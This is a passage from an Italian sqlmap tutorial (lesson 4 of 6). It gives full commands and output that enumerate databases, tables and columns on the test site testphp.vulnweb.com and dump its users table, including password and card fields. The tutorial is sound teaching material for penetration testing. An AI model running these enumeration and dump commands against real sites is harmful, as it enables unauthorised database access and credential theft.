- Learn
- Guida SQL Injection con Sqlmap
- Tecniche di enumerazione database con sqlmap
lezione
4
di 6
Tecniche di enumerazione database con sqlmap
Enumerazione database con sqlmap
Vedremo ora qualche tecnica di enumerazione per estrarre informazioni utili dal database. Se volessimo estrarre maggiori informazioni sui servizi ai quale è connessa la nostra web application potremmo utilizzare le opzioni:
- –banner
- –fingerprint
Analogamente per ottenere la lista degli utenti e password:
- –users
- –passwords
Per verificare se l’utente è un amministratore:
--is-dba
NOTA – non sempre tutte queste informazione sono accessibili. Vedremo ora come estrarre passo dopo passo il contenuto del database. Si procede specificando l’opzione “–dbs” per ottenere la lista dei database disponibili:
user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql --dbs
... [12:47:32] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [12:47:32] [INFO] fetching database names [12:47:32] [INFO] the SQL query used returns 3 entries [12:47:33] [INFO] retrieved: information_schema [12:47:33] [INFO] retrieved: acuart [12:47:33] [INFO] retrieved: modrewriteShop available databases [3]: [*] acuart [*] information_schema [*] modrewriteShop [12:47:33] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at: 12:47:33
Per enumerare le tabelle del database “acuart” sarà necessario aggiungere al precedente comando le opzioni “-D acuart –tables”:
user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart --tables
[...] [12:48:46] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [12:48:46] [INFO] fetching tables for database 'acuart' [12:48:46] [INFO] the SQL query used returns 7 entries [12:48:46] [INFO] retrieved: acuart [12:48:47] [INFO] retrieved: artists [12:48:47] [INFO] retrieved: acuart [12:48:47] [INFO] retrieved: carts [12:48:47] [INFO] retrieved: acuart [12:48:47] [INFO] retrieved: categ [12:48:47] [INFO] retrieved: acuart [12:48:47] [INFO] retrieved: featured [12:48:48] [INFO] retrieved: acuart [12:48:48] [INFO] retrieved: guestbook [12:48:48] [INFO] retrieved: acuart [12:48:48] [INFO] retrieved: pictures [12:48:48] [INFO] retrieved: acuart [12:48:48] [INFO] retrieved: users Database: acuart [7 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | users | +-----------+ [12:48:48] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at: 12:48:48
Ora è possibile ottenere il listato delle colonne con l’opzione “–columns”:
user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --columns
[...] [12:49:27] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [12:49:27] [INFO] fetching columns for table 'users' on database 'acuart' [12:49:27] [INFO] the SQL query used returns 8 entries [12:49:28] [INFO] retrieved: uname [12:49:28] [INFO] retrieved: varchar(100) [12:49:28] [INFO] retrieved: pass [12:49:28] [INFO] retrieved: varchar(100) [12:49:28] [INFO] retrieved: cc [12:49:28] [INFO] retrieved: varchar(100) [12:49:28] [INFO] retrieved: address [12:49:29] [INFO] retrieved: mediumtext [12:49:29] [INFO] retrieved: email [12:49:29] [INFO] retrieved: varchar(100) [12:49:29] [INFO] retrieved: name [12:49:29] [INFO] retrieved: varchar(100) [12:49:29] [INFO] retrieved: phone [12:49:29] [INFO] retrieved: varchar(100) [12:49:30] [INFO] retrieved: cart [12:49:30] [INFO] retrieved: varchar(100) Database: acuart Table: users [8 columns] +---------+--------------+ | Column | Type | +---------+--------------+ | address | mediumtext | | cart | varchar(100) | | cc | varchar(100) | | email | varchar(100) | | name | varchar(100) | | pass | varchar(100) | | phone | varchar(100) | | uname | varchar(100) | +---------+--------------+ [12:49:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at: 12:49:30
Infine recupereremo il contenuto del database limitandoci alle prime due tuple con l’opzione “–dump –start 1 –stop 3” :
user@backbox:~$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --dump --start 1 --stop 5
[...] [12:59:19] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [12:59:19] [INFO] fetching columns for table 'users' on database 'acuart' [12:59:19] [INFO] the SQL query used returns 8 entries [12:59:20] [INFO] retrieved: uname [12:59:20] [INFO] retrieved: varchar(100) [12:59:20] [INFO] retrieved: pass [12:59:20] [INFO] retrieved: varchar(100) [12:59:20] [INFO] retrieved: cc [12:59:20] [INFO] retrieved: varchar(100) [12:59:20] [INFO] retrieved: address [12:59:21] [INFO] retrieved: mediumtext [12:59:21] [INFO] retrieved: email [12:59:21] [INFO] retrieved: varchar(100) [12:59:21] [INFO] retrieved: name [12:59:21] [INFO] retrieved: varchar(100) [12:59:21] [INFO] retrieved: phone [12:59:21] [INFO] retrieved: varchar(100) [12:59:22] [INFO] retrieved: cart [12:59:22] [INFO] retrieved: varchar(100) [12:59:22] [INFO] fetching entries for table 'users' on database 'acuart' [12:59:22] [INFO] retrieved: cacucko [12:59:22] [INFO] retrieved: cacucko [12:59:22] [INFO] retrieved: cacucko [12:59:22] [INFO] retrieved: gopala [12:59:23] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa [12:59:23] [INFO] retrieved: gopala [12:59:23] [INFO] retrieved: hacked by cacucko! [12:59:23] [INFO] retrieved: Russian hackers! [12:59:23] [INFO] retrieved: gopala [12:59:23] [INFO] retrieved: gopala [12:59:23] [INFO] retrieved: gopala [12:59:23] [INFO] retrieved: gopala [12:59:24] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa [12:59:24] [INFO] retrieved: test [12:59:24] [INFO] retrieved: gopala [12:59:24] [INFO] retrieved: gopala recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n Database: acuart Table: users [2 entries] +--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ | address | cart | cc | email | name | pass | phone | uname | +--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ | hacked by cacucko! | 1b90caf669e05660efdf1d23b48100fa | cacucko | Russian hackers! | cacucko | gopala | cacucko | gopala | | gopala | 1b90caf669e05660efdf1d23b48100fa | gopala | gopala | gopala | gopala | gopala | test | +--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+ [12:59:30] [INFO] Table 'acuart.users' dumped to CSV file '/home/user/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv' [12:59:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com' [*] shutting down at: 12:59:30
Se vuoi aggiornamenti su Tecniche di enumerazione database con sqlmap inserisci la tua email nel box qui sotto:
Compilando il presente form acconsento a ricevere le informazioni relative ai servizi di cui alla presente pagina ai sensi dell'informativa sulla privacy.
La tua iscrizione è andata a buon fine. Se vuoi ricevere informazioni personalizzate compila anche i seguenti campi opzionali:
Compilando il presente form acconsento a ricevere le informazioni relative ai servizi di cui alla presente pagina ai sensi dell'informativa sulla privacy.
